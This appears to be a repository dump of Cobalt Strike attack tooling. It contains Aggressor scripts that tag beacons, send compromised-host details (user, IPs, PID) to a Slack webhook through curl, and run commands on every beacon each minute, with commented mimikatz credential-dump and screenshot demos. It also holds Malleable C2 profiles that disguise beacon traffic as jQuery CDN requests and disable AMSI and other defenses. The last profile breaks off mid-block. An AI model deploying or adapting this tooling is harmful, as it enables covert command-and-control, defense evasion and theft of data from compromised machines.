├── AggressorScripts ├── BeaconNote.cna ├── BeaconNotify.cna └── LoopDo.cna ├── Malleable C2 Files ├── jquery.xxx.js_CN_cdn.bootcss.com_for_cs3.14_.txt └── jquery.xxx.js_code.bootcdn.net_for_cs4.0_.txt └── README.md /AggressorScripts/BeaconNote.cna: -------------------------------------------------------------------------------- 1 | # author: arr0w1 2 | # set Beacon note - set Beacon note to its ID and the time it was established on load and initial checkin 3 | # for example 4 | # bid: 86985 Established: 11/13/2019 16:50:19 (CST) 5 | 6 | on beacon_initial { 7 | bnote($1,"bid: " . $1 . " Established: " . formatDate('MM/dd/yyyy HH:mm:ss (z)')); 8 | } 9 | -------------------------------------------------------------------------------- /AggressorScripts/BeaconNotify.cna: -------------------------------------------------------------------------------- 1 | # author: arr0w1 2 | # Send the message to Slack on beacon_initial(when a Beacon calls home for the first time). 3 | # Replace the 'slack_webhookURL' with yours. 4 | # 5 | # For example, you will receive the following message when a Beacon calls home for the first time. 6 | # 7 | # ------msg------ 8 | # teamserver_name: default 9 | # 10 | # beacon id : 12542 11 | # beacon note : 12 | # computer name : WIN7-Jack 13 | # User : Administrator * 14 | # PID : 1140 15 | # host : 10.13.13.13 16 | # external IP : 127.0.0.1 17 | # internal IP : 10.13.13.13 18 | # port : 19 | # os : Windows 20 | # ver : 6.1 21 | # barch : x64 22 | # is64 : 1 23 | # charset : x-mswin-936 24 | # pbid : 25 | # phint : 0 26 | # alive : true 27 | # last : 301 28 | # lastf : 301ms 29 | # ------end------ 30 | 31 | 32 | on beacon_initial { 33 | $one_bid = $1; 34 | $teamserver_name = "default"; 35 | $slack_webhookURL = 'https://hooks.slack.com/services/TTTTTTTTT/BBBBBBBBB/abc01efL2345q6hhhAAAaj7'; 36 | 37 | $msg = "\n------msg------\n" . 38 | "teamserver_name: " . $teamserver_name . "\n" . 39 | "\n\n" . "\n" . 40 | "beacon id : " .beacon_info($one_bid, "id") . "\n" . 41 | "beacon note : " . beacon_info($one_bid, "note") . "\n" . 42 | "computer name : " . beacon_info($one_bid, "computer") . "\n" . 43 | beacon_info($one_bid, "note") . "\n" . 44 | "User : " .beacon_info($one_bid, "user") . "\n" . 45 | "PID : " . beacon_info($one_bid, "pid") . "\n" . 46 | "host : " . beacon_info($one_bid, "host") . "\n" . 47 | "external IP : " . beacon_info($one_bid, "external") . "\n" . 48 | "internal IP : " . beacon_info($one_bid, "internal") . "\n" . 49 | "port : " . beacon_info($one_bid, "port") . "\n" . 50 | "os : " . beacon_info($one_bid, "os") . "\n" . 51 | "ver : " . beacon_info($one_bid, "ver") . "\n" . 52 | "barch : " . beacon_info($one_bid, "barch") . "\n" . 53 | "is64 : " . beacon_info($one_bid, "is64") . "\n" . 54 | "charset : " . beacon_info($one_bid, "charset") . "\n" . 55 | "pbid : " . beacon_info($one_bid, "pbid") . "\n" . 56 | "phint : " . beacon_info($one_bid, "phint") . "\n" . 57 | "alive : " . beacon_info($one_bid, "alive") . "\n" . 58 | "last : " . beacon_info($one_bid, "last"). "\n" . 59 | "lastf : " . beacon_info($one_bid, "lastf"). "\n------end------\n"; 60 | 61 | exec(@('curl','-X','POST','-H','Content-type: application/json','--data','{"text":"'.$msg.'"}',$slack_webhookURL)); 62 | 63 | } 64 | -------------------------------------------------------------------------------- /AggressorScripts/LoopDo.cna: -------------------------------------------------------------------------------- 1 | # author: arr0w1 2 | # do somethings every X minutes while enabled.(on all beacons) 3 | # for example, run the command 'xxx' every 1 minutes while (Replace 'xxx' with a custom command) 4 | 5 | 6 | $enabledsetting = 'false'; 7 | 8 | sub your-settings { 9 | @bids = $1; 10 | 11 | $dialog = dialog("Loop Settings", %(enabled => $enabledsetting), lambda({ 12 | $enabledsetting = $3['enabled']; 13 | 14 | })); 15 | 16 | dialog_description($dialog, "do somethings every X minutes while enabled.(on all beacons)"); 17 | 18 | drow_checkbox($dialog, "enabled", "Run the command 'xxx' every 1 minutes while - Enabled:"); 19 | 20 | dbutton_action($dialog, "Save"); 21 | 22 | dialog_show($dialog); 23 | 24 | } 25 | 26 | 27 | on heartbeat_1m { 28 | if ($enabledsetting eq 'true') { 29 | foreach $beacon (beacons()) { 30 | # get beacon id 31 | $id = $beacon['id']; 32 | 33 | # Demo1 - Ask Beacon to run a command with cmd.exe 34 | # The netstat command requires SYSTEM or Administrator permissions 35 | # 'xxx' 36 | bshell($id, "netstat -antob"); 37 | 38 | # Demo2 - Ask Beacon to run a command with cmd.exe 39 | # binput($id, "screenshot"); 40 | # bscreenshot($id); 41 | 42 | # Demo3 - Ask Beacon to dump in-memory credentials with mimikatz 43 | # binput($id, "logonpasswords"); 44 | # blogonpasswords($id); 45 | } 46 | } 47 | } 48 | 49 | # Define the top-level menubar 50 | menubar("LoopDo", "loop-settings", 2); 51 | 52 | # Define the popup button 53 | popup loop-settings { 54 | item "Configure Settings" { 55 | your-settings(); 56 | } 57 | } 58 | -------------------------------------------------------------------------------- /Malleable C2 Files/jquery.xxx.js_CN_cdn.bootcss.com_for_cs3.14_.txt: -------------------------------------------------------------------------------- 1 | 2 | set sample_name "jQuery Profile"; 3 | set sleeptime "60000"; 4 | set jitter "37"; 5 | set useragent "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"; 6 | https-certificate { 7 | set C "US"; 8 | set CN "bootcss.com"; 9 | set O "bootcss"; 10 | set OU "Certificate Authority"; 11 | set validity "365"; 12 | } 13 | set spawnto_x86 "%windir%\\syswow64\\svchost.exe -k netsvcs"; 14 | set spawnto_x64 "%windir%\\sysnative\\svchost.exe -k netsvcs"; 15 | set pipename "mojo.5688.8052.183894939787088877##"; # Common Chrome named pipe 16 | set pipename_stager "mojo.5688.8052.35780273329370473##"; # Common Chrome named pipe 17 | set maxdns "255"; 18 | set dns_max_txt "252"; 19 | set dns_idle "74.125.196.113"; 20 | set dns_sleep "0"; 21 | set dns_stager_prepend ".resources.123456."; 22 | set dns_stager_subhost ".feeds.123456."; 23 | set host_stage "true"; 24 | http-stager { 25 | set uri_x86 "/jquery-3.3.1.slim.min.js"; 26 | set uri_x64 "/jquery-3.3.2.slim.min.js"; 27 | server { 28 | header "Server" "NetDNA-cache/2.2"; 29 | header "Cache-Control" "max-age=0, no-cache"; 30 | header "Pragma" "no-cache"; 31 | header "Connection" "keep-alive"; 32 | header "Content-Type" "application/javascript; charset=utf-8"; 33 | output { 34 | prepend "!function(e,t){\"use strict\";\"object\"==typeof module&&\"object\"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error(\"jQuery requires a window with a document\");return t(e)}:t(e)}(\"undefined\"!=typeof window?window:this,function(e,t){\"use strict\";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,s=n.push,u=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,p=f.toString,d=p.call(Object),h={},g=function e(t){return\"function\"==typeof t&&\"number\"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement(\"script\");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+\"\":\"object\"==typeof e||\"function\"==typeof e?l[c.call(e)]||\"object\":typeof e}var b=\"3.3.1\",w=function(e,t){return new w.fn.init(e,t)},T=/^[\\s\\uFEFF\\xA0]+|[\\s\\uFEFF\\xA0]+$/g;w.fn=w.prototype={jquery:\"3.3.1\",constructor:w,length:0,toArray:function(){return o.call(this)},get:function(e){return null==e?o.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=w.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return w.each(this,e)},map:function(e){return this.pushStack(w.map(this,function(t,n){return e.call(t,n,t)}))},slice:function(){return this.pushStack(o.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(n>=0&&n0&&t-1 in e)}var E=function(e){var t,n,r,i,o,a,s,u,l,c,f,p,d,h,g,y,v,m,x,b=\"sizzle\"+1*new Date,w=e.document,T=0,C=0,E=ae(),k=ae(),S=ae(),D=function(e,t){return e===t&&(f=!0),0},N={}.hasOwnProperty,A=[],j=A.pop,q=A.push,L=A.push,H=A.slice,O=function(e,t){for(var n=0,r=e.length;n0?this.on(t,null,e,n):this.trigger(t)}}),w.fn.extend({hover:function(e,t){return this.mouseenter(e).mouseleave(t||e)}}),w.fn.extend({bind:function(e,t,n){return this.on(e,null,t,n)},unbind:function(e,t){return this.off(e,null,t)},delegate:function(e,t,n,r){return this.on(t,e,n,r)},undelegate:function(e,t,n){return 1===arguments.length?this.off(e,\"**\"):this.off(t,e||\"**\",n)}}),w.proxy=function(e,t){var n,r,i;if(\"string\"==typeof t&&(n=e[t],t=e,e=n),g(e))return r=o.call(arguments,2),i=function(){return e.apply(t||this,r.concat(o.call(arguments)))},i.guid=e.guid=e.guid||w.guid++,i},w.holdReady=function(e){e?w.readyWait++:w.ready(!0)},w.isArray=Array.isArray,w.parseJSON=JSON.parse,w.nodeName=N,w.isFunction=g,w.isWindow=y,w.camelCase=G,w.type=x,w.now=Date.now,w.isNumeric=function(e){var t=w.type(e);return(\"number\"===t||\"string\"===t)&&!isNaN(e-parseFloat(e))},\"function\"==typeof define&&define.amd&&define(\"jquery\",[],function(){return w});var Jt=e.jQuery,Kt=e.$;return w.noConflict=function(t){return e.$===w&&(e.$=Kt),t&&e.jQuery===w&&(e.jQuery=Jt),w},t||(e.jQuery=e.$=w),w});"; 38 | print; 39 | } 40 | } 41 | client { 42 | header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"; 43 | header "Accept-Language" "en-US,en;q=0.5"; 44 | header "Host" "cdn.bootcss.com"; 45 | header "Referer" "http://cdn.bootcss.com/"; 46 | header "Accept-Encoding" "gzip, deflate"; 47 | } 48 | } 49 | stage { 50 | set userwx "false"; 51 | set stomppe "true"; 52 | set obfuscate "true"; 53 | set name "srv.dll"; 54 | set cleanup "true"; 55 | 56 | set checksum "0"; 57 | set compile_time "12 Nov 2016 14:07:23"; 58 | set entry_point "650688"; 59 | set image_size_x86 "4661248"; 60 | set image_size_x64 "4661248"; 61 | set rich_header "\x3e\x98\xfe\x75\x7a\xf9\x90\x26\x7a\xf9\x90\x26\x7a\xf9\x90\x26\x73\x81\x03\x26\xfc\xf9\x90\x26\x17\xa4\x93\x27\x79\xf9\x90\x26\x7a\xf9\x91\x26\x83\xfd\x90\x26\x17\xa4\x91\x27\x65\xf9\x90\x26\x17\xa4\x95\x27\x77\xf9\x90\x26\x17\xa4\x94\x27\x6c\xf9\x90\x26\x17\xa4\x9e\x27\x56\xf8\x90\x26\x17\xa4\x6f\x26\x7b\xf9\x90\x26\x17\xa4\x92\x27\x7b\xf9\x90\x26\x52\x69\x63\x68\x7a\xf9\x90\x26\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | transform-x86 { 72 | prepend "\x90\x90\x90\x90\x90\x90\x90\x90\x90"; 73 | strrep "ReflectiveLoader" "execute"; 74 | strrep "This program cannot be run in DOS mode" ""; 75 | strrep "beacon.dll" ""; 76 | } 77 | transform-x64 { 78 | prepend "\x90\x90\x90\x90\x90\x90\x90\x90\x90"; 79 | strrep "ReflectiveLoader" "execute"; 80 | strrep "beacon.x64.dll" ""; 81 | } 82 | stringw "jQuery"; 83 | } 84 | http-get { 85 | set uri "/jquery-3.3.1.min.js"; 86 | set verb "GET"; 87 | client { 88 | header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"; 89 | header "Host" "cdn.bootcss.com"; 90 | header "Referer" "http://cdn.bootcss.com/"; 91 | header "Accept-Encoding" "gzip, deflate"; 92 | metadata { 93 | base64url; 94 | prepend "__cfduid="; 95 | header "Cookie"; 96 | } 97 | } 98 | server { 99 | header "Server" "NetDNA-cache/2.2"; 100 | header "Cache-Control" "max-age=0, no-cache"; 101 | header "Pragma" "no-cache"; 102 | header "Connection" "keep-alive"; 103 | header "Content-Type" "application/javascript; charset=utf-8"; 104 | output { 105 | mask; 106 | base64url; 107 | 108 | 109 | prepend "!function(e,t){\"use strict\";\"object\"==typeof module&&\"object\"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error(\"jQuery requires a window with a document\");return t(e)}:t(e)}(\"undefined\"!=typeof window?window:this,function(e,t){\"use strict\";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,s=n.push,u=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,p=f.toString,d=p.call(Object),h={},g=function e(t){return\"function\"==typeof t&&\"number\"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement(\"script\");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+\"\":\"object\"==typeof e||\"function\"==typeof e?l[c.call(e)]||\"object\":typeof e}var b=\"3.3.1\",w=function(e,t){return new w.fn.init(e,t)},T=/^[\\s\\uFEFF\\xA0]+|[\\s\\uFEFF\\xA0]+$/g;w.fn=w.prototype={jquery:\"3.3.1\",constructor:w,length:0,toArray:function(){return o.call(this)},get:function(e){return null==e?o.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=w.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return w.each(this,e)},map:function(e){return this.pushStack(w.map(this,function(t,n){return e.call(t,n,t)}))},slice:function(){return this.pushStack(o.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(n>=0&&n0&&t-1 in e)}var E=function(e){var t,n,r,i,o,a,s,u,l,c,f,p,d,h,g,y,v,m,x,b=\"sizzle\"+1*new Date,w=e.document,T=0,C=0,E=ae(),k=ae(),S=ae(),D=function(e,t){return e===t&&(f=!0),0},N={}.hasOwnProperty,A=[],j=A.pop,q=A.push,L=A.push,H=A.slice,O=function(e,t){for(var n=0,r=e.length;n0?this.on(t,null,e,n):this.trigger(t)}}),w.fn.extend({hover:function(e,t){return this.mouseenter(e).mouseleave(t||e)}}),w.fn.extend({bind:function(e,t,n){return this.on(e,null,t,n)},unbind:function(e,t){return this.off(e,null,t)},delegate:function(e,t,n,r){return this.on(t,e,n,r)},undelegate:function(e,t,n){return 1===arguments.length?this.off(e,\"**\"):this.off(t,e||\"**\",n)}}),w.proxy=function(e,t){var n,r,i;if(\"string\"==typeof t&&(n=e[t],t=e,e=n),g(e))return r=o.call(arguments,2),i=function(){return e.apply(t||this,r.concat(o.call(arguments)))},i.guid=e.guid=e.guid||w.guid++,i},w.holdReady=function(e){e?w.readyWait++:w.ready(!0)},w.isArray=Array.isArray,w.parseJSON=JSON.parse,w.nodeName=N,w.isFunction=g,w.isWindow=y,w.camelCase=G,w.type=x,w.now=Date.now,w.isNumeric=function(e){var t=w.type(e);return(\"number\"===t||\"string\"===t)&&!isNaN(e-parseFloat(e))},\"function\"==typeof define&&define.amd&&define(\"jquery\",[],function(){return w});var Jt=e.jQuery,Kt=e.$;return w.noConflict=function(t){return e.$===w&&(e.$=Kt),t&&e.jQuery===w&&(e.jQuery=Jt),w},t||(e.jQuery=e.$=w),w});"; 113 | print; 114 | } 115 | } 116 | } 117 | http-post { 118 | set uri "/jquery-3.3.2.min.js"; 119 | set verb "POST"; 120 | client { 121 | header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"; 122 | header "Host" "cdn.bootcss.com"; 123 | header "Referer" "http://cdn.bootcss.com/"; 124 | header "Accept-Encoding" "gzip, deflate"; 125 | 126 | id { 127 | mask; 128 | base64url; 129 | parameter "__cfduid"; 130 | } 131 | 132 | output { 133 | mask; 134 | base64url; 135 | print; 136 | } 137 | } 138 | server { 139 | header "Server" "NetDNA-cache/2.2"; 140 | header "Cache-Control" "max-age=0, no-cache"; 141 | header "Pragma" "no-cache"; 142 | header "Connection" "keep-alive"; 143 | header "Content-Type" "application/javascript; charset=utf-8"; 144 | output { 145 | mask; 146 | base64url; 147 | 148 | 149 | prepend "!function(e,t){\"use strict\";\"object\"==typeof module&&\"object\"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error(\"jQuery requires a window with a document\");return t(e)}:t(e)}(\"undefined\"!=typeof window?window:this,function(e,t){\"use strict\";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,s=n.push,u=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,p=f.toString,d=p.call(Object),h={},g=function e(t){return\"function\"==typeof t&&\"number\"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement(\"script\");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+\"\":\"object\"==typeof e||\"function\"==typeof e?l[c.call(e)]||\"object\":typeof e}var b=\"3.3.1\",w=function(e,t){return new w.fn.init(e,t)},T=/^[\\s\\uFEFF\\xA0]+|[\\s\\uFEFF\\xA0]+$/g;w.fn=w.prototype={jquery:\"3.3.1\",constructor:w,length:0,toArray:function(){return o.call(this)},get:function(e){return null==e?o.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=w.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return w.each(this,e)},map:function(e){return this.pushStack(w.map(this,function(t,n){return e.call(t,n,t)}))},slice:function(){return this.pushStack(o.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(n>=0&&n0&&t-1 in e)}var E=function(e){var t,n,r,i,o,a,s,u,l,c,f,p,d,h,g,y,v,m,x,b=\"sizzle\"+1*new Date,w=e.document,T=0,C=0,E=ae(),k=ae(),S=ae(),D=function(e,t){return e===t&&(f=!0),0},N={}.hasOwnProperty,A=[],j=A.pop,q=A.push,L=A.push,H=A.slice,O=function(e,t){for(var n=0,r=e.length;n0?this.on(t,null,e,n):this.trigger(t)}}),w.fn.extend({hover:function(e,t){return this.mouseenter(e).mouseleave(t||e)}}),w.fn.extend({bind:function(e,t,n){return this.on(e,null,t,n)},unbind:function(e,t){return this.off(e,null,t)},delegate:function(e,t,n,r){return this.on(t,e,n,r)},undelegate:function(e,t,n){return 1===arguments.length?this.off(e,\"**\"):this.off(t,e||\"**\",n)}}),w.proxy=function(e,t){var n,r,i;if(\"string\"==typeof t&&(n=e[t],t=e,e=n),g(e))return r=o.call(arguments,2),i=function(){return e.apply(t||this,r.concat(o.call(arguments)))},i.guid=e.guid=e.guid||w.guid++,i},w.holdReady=function(e){e?w.readyWait++:w.ready(!0)},w.isArray=Array.isArray,w.parseJSON=JSON.parse,w.nodeName=N,w.isFunction=g,w.isWindow=y,w.camelCase=G,w.type=x,w.now=Date.now,w.isNumeric=function(e){var t=w.type(e);return(\"number\"===t||\"string\"===t)&&!isNaN(e-parseFloat(e))},\"function\"==typeof define&&define.amd&&define(\"jquery\",[],function(){return w});var Jt=e.jQuery,Kt=e.$;return w.noConflict=function(t){return e.$===w&&(e.$=Kt),t&&e.jQuery===w&&(e.jQuery=Jt),w},t||(e.jQuery=e.$=w),w});"; 153 | print; 154 | } 155 | } 156 | } 157 | -------------------------------------------------------------------------------- /Malleable C2 Files/jquery.xxx.js_code.bootcdn.net_for_cs4.0_.txt: -------------------------------------------------------------------------------- 1 | # Malleable C2 Profile 2 | # Version: CobaltStrike 4.0 3 | 4 | # Description: 5 | # c2 profile attempting to mimic a jquery.xxxx.js request 6 | # uses signed certificates 7 | # or self-signed certificates 8 | # Authors: @joevest, @andrewchiles, @001SPARTaN 9 | # Modifier: 1135(arr0w1) 10 | 11 | ################################################ 12 | ## Tips for Profile Parameter Values 13 | ################################################ 14 | 15 | ## Parameter Values 16 | ## Enclose parameter in Double quote, not single 17 | ## set useragent "SOME AGENT"; GOOD 18 | ## set useragent 'SOME AGENT'; BAD 19 | 20 | ## Some special characters do not need escaping 21 | ## prepend "!@#$%^&*()"; 22 | 23 | ## Semicolons are ok 24 | ## prepend "This is an example;"; 25 | 26 | ## Escape Double quotes 27 | ## append "here is \"some\" stuff"; 28 | 29 | ## Escape Backslashes 30 | ## append "more \\ stuff"; 31 | 32 | ## HTTP Values 33 | ## Program .http-post.client must have a compiled size less than 252 bytes. 34 | 35 | ################################################ 36 | ## Profile Name 37 | ################################################ 38 | ## Description: 39 | ## The name of this profile (used in the Indicators of Compromise report) 40 | ## Defaults: 41 | ## sample_name: My Profile 42 | ## Guidelines: 43 | ## - Choose a name that you want in a report 44 | set sample_name "jQuery. For CS 4.0 Profile"; 45 | 46 | ################################################ 47 | ## Sleep Times 48 | ################################################ 49 | ## Description: 50 | ## Timing between beacon check in 51 | ## Defaults: 52 | ## sleeptime: 60000 53 | ## jitter: 0 54 | ## Guidelines: 55 | ## - Beacon Timing in milliseconds (1000 = 1 sec) 56 | set sleeptime "45000"; # 45 Seconds 57 | #set sleeptime "300000"; # 5 Minutes 58 | #set sleeptime "600000"; # 10 Minutes 59 | #set sleeptime "900000"; # 15 Minutes 60 | #set sleeptime "1200000"; # 20 Minutes 61 | #set sleeptime "1800000"; # 30 Minutes 62 | #set sleeptime "3600000"; # 1 Hours 63 | set jitter "37"; # % jitter 64 | 65 | ################################################ 66 | ## User-Agent 67 | ################################################ 68 | ## Description: 69 | ## User-Agent string used in HTTP requests 70 | ## Defaults: 71 | ## useragent: Internet Explorer (Random) 72 | ## Guidelines 73 | ## - Use a User-Agent values that fits with your engagement 74 | ## - useragent can only be 128 chars 75 | 76 | ## IE 10 77 | # set useragent "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 7.0; InfoPath.3; .NET CLR 3.1.40767; Trident/6.0; en-IN)"; 78 | 79 | ## MS IE 11 User Agent 80 | # set useragent "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"; 81 | 82 | ## macOS 83 | # set useragent "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.192 Safari/537.36" 84 | 85 | ## MS win10 Chrome85 86 | set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"; 87 | 88 | 89 | ################################################ 90 | ## SSL CERTIFICATE 91 | ################################################ 92 | ## Description: 93 | ## Signed or self-signed TLS/SSL Certifcate used for C2 communication using an HTTPS listener 94 | ## Defaults: 95 | ## All certificate values are blank 96 | ## Guidelines: 97 | ## - Best Option - Use a certifcate signed by a trusted certificate authority 98 | ## - Ok Option - Create your own self signed certificate 99 | ## - Option - Set self-signed certificate values 100 | https-certificate { 101 | 102 | ## Option 1) Trusted and Signed Certificate 103 | ## Use keytool to create a Java Keystore file. 104 | ## Refer to https://www.cobaltstrike.com/help-malleable-c2#validssl 105 | ## or https://github.com/killswitch-GUI/CobaltStrike-ToolKit/blob/master/HTTPsC2DoneRight.sh 106 | 107 | ## Option 2) Create your own Self-Signed Certificate 108 | ## Use keytool to import your own self signed certificates 109 | 110 | #set keystore "/pathtokeystore"; 111 | #set password "password"; 112 | 113 | ## Option 3) Cobalt Strike Self-Signed Certificate 114 | set C "US"; 115 | set CN "bootcdn.net"; 116 | set O "jQuery"; 117 | set OU "Certificate Authority"; 118 | set validity "365"; 119 | } 120 | 121 | ################################################ 122 | ## Post Exploitations 123 | ################################################ 124 | ## Description: 125 | ## Controls post-exploitation jobs, including default x86/x64 program to open and inject shellcode into, AMSI bypass for execute-assembly, powerpick, and psinject 126 | ## Defaults: 127 | ## spawnto_x86: %windir%\\syswow64\\rundll32.exe 128 | ## spawnto_x64: %windir%\\sysnative\\rundll32.exe 129 | ## obfuscate: false 130 | ## smartinject: false 131 | ## amsi_disable: false 132 | ## Guidelines 133 | ## - spawnto can only be 63 chars 134 | ## - OPSEC WARNING!!!! The spawnto in this example will contain identifiable command line strings 135 | ## - sysnative for x64 and syswow64 for x86 136 | ## - Example x64 : C:\\Windows\\sysnative\\w32tm.exe 137 | ## Example x86 : C:\\Windows\\syswow64\\w32tm.exe 138 | ## - The binary doesnt do anything wierd (protected binary, etc) 139 | ## - !! Don't use these !! 140 | ## - "csrss.exe","logoff.exe","rdpinit.exe","bootim.exe","smss.exe","userinit.exe","sppsvc.exe" 141 | ## - A binary that executes without the UAC 142 | ## - 64 bit for x64 143 | ## - 32 bit for x86 144 | ## - You can add command line parameters to blend 145 | ## - set spawnto_x86 "%windir%\\syswow64\\svchost.exe -k netsvcs"; 146 | ## - set spawnto_x64 "%windir%\\sysnative\\svchost.exe -k netsvcs"; 147 | ## - Note: svchost.exe may look weird as the parent process 148 | ## - The obfuscate option scrambles the content of the post-ex DLLs and settles the post-ex capability into memory in a more OPSEC-safe way. It’s very similar to the obfuscate and userwx options available for Beacon via the stage block. 149 | ## - The amsi_disable option directs powerpick, execute-assembly, and psinject to patch the AmsiScanBuffer function before loading .NET or PowerShell code. This limits the Antimalware Scan Interface visibility into these capabilities. 150 | ## - The smartinject option directs Beacon to embed key function pointers, like GetProcAddress and LoadLibrary, into its same-architecture post-ex DLLs. This allows post-ex DLLs to bootstrap themselves in a new process without shellcode-like behavior that is detected and mitigated by watching memory accesses to the PEB and kernel32.dll 151 | 152 | post-ex { 153 | # Optionally specify non-existent filepath to force manual specification based on the Beacon host's running processes 154 | set spawnto_x86 "%windir%\\syswow64\\dllhost.exe"; 155 | # Hardcode paths like C:\\Windows\\System32\\dllhost.exe to avoid potential detections for %SYSNATIVE% use. !! This will break when attempting to spawn a 64bit post-ex job from a 32bit Beacon. 156 | set spawnto_x64 "%windir%\\sysnative\\dllhost.exe"; 157 | 158 | # change the permissions and content of our post-ex DLLs 159 | set obfuscate "true"; 160 | # pass key function pointers from Beacon to its child jobs 161 | set smartinject "true"; 162 | # disable AMSI in powerpick, execute-assembly, and psinject 163 | set amsi_disable "true"; 164 | } 165 | 166 | ################################################ 167 | ## TCP Beacon 168 | ################################################ 169 | ## Description: 170 | ## TCP Beacon listen port 171 | ## - https://blog.cobaltstrike.com/2019/01/02/cobalt-strike-3-13-why-do-we-argue/ 172 | ## - https://www.cobaltstrike.com/help-tcp-beacon 173 | ## Defaults: 174 | ## tcp_port: 4444 175 | ## Guidelines 176 | ## - OPSEC WARNING!!!!! The default port is 4444. This is bad. You can change dynamicaly but the port set in the profile will always be used first before switching to the dynamic port. 177 | ## - Use a port other that default. Choose something not is use. 178 | ## - Use a port greater than 1024 is generally a good idea 179 | set tcp_port "42585"; 180 | 181 | ################################################ 182 | ## SMB beacons 183 | ################################################ 184 | ## Description: 185 | ## Peer-to-peer beacon using SMB for communication 186 | ## Defaults: 187 | ## pipename: msagent_## 188 | ## pipename_stager: status_## 189 | ## Guidelines: 190 | ## - Do not use an existing namedpipe, Beacon doesn't check for conflict! 191 | ## - the ## is replaced with a number unique to a teamserver 192 | ## --------------------- 193 | set pipename "mojo.5688.8052.183894939787088877##"; # Common Chrome named pipe 194 | set pipename_stager "mojo.5688.8052.35780273329370473##"; # Common Chrome named pipe 195 | 196 | ################################################ 197 | ## DNS beacons 198 | ################################################ 199 | ## Description: 200 | ## Beacon that uses DNS for communication 201 | ## Defaults: 202 | ## maxdns: 255 203 | ## dns_idle: 0.0.0.0 204 | ## dns_max_txt: 252 205 | ## dns_sleep: 0 206 | ## dns_stager_prepend: N/A 207 | ## dns_stager_subhost: .stage.123456. 208 | ## dns_ttl: 1 209 | ## Guidelines: 210 | ## - DNS beacons generate a lot of DNS request. DNS beacon are best used as low and slow back up C2 channels 211 | set maxdns "255"; 212 | set dns_max_txt "252"; 213 | set dns_idle "74.125.196.113"; #google.com (change this to match your campaign) 214 | set dns_sleep "0"; # Force a sleep prior to each individual DNS request. (in milliseconds) 215 | set dns_stager_prepend ".resources.123456."; 216 | set dns_stager_subhost ".feeds.123456."; 217 | 218 | ################################################ 219 | ## Staging process 220 | ################################################ 221 | ## OPSEC WARNING!!!! Staging has serious OPSEC issues. It is recommed to disable staging and use stageless payloads 222 | ## Description: 223 | ## Malleable C2's http-stager block customizes the HTTP staging process 224 | ## Defaults: 225 | ## uri_x86 Random String 226 | ## uri_x64 Random String 227 | ## HTTP Server Headers - Basic HTTP Headers 228 | ## HTTP Client Headers - Basic HTTP Headers 229 | ## Guidelines: 230 | ## - Add customize HTTP headers to the HTTP traffic of your campaign 231 | ## - Only specify the `Host` header when peforming domain fronting. Be aware of HTTP proxy's rewriting your request per RFC2616 Section 14.23 232 | ## - https://blog.cobaltstrike.com/2017/02/06/high-reputation-redirectors-and-domain-fronting/ 233 | ## - Note: Data transform language not supported in http stageing (mask, base64, base64url, etc) 234 | 235 | #set host_stage "false"; # Do not use staging. Must use stagles payloads 236 | set host_stage "true"; # Host payload for staging over HTTP, HTTPS, or DNS. Required by stagers.set 237 | 238 | http-stager { 239 | set uri_x86 "/ajax/libs/jquery/3.3.1/jquery.slim.min.js"; 240 | set uri_x64 "/ajax/libs/jquery/3.3.0/jquery.slim.min.js"; 241 | 242 | server { 243 | header "Server" "NetDNA-cache/2.2"; 244 | header "Cache-Control" "max-age=0, no-cache"; 245 | header "Pragma" "no-cache"; 246 | header "Connection" "keep-alive"; 247 | header "Content-Type" "application/javascript; charset=utf-8"; 248 | output { 249 | ## The javascript was changed. 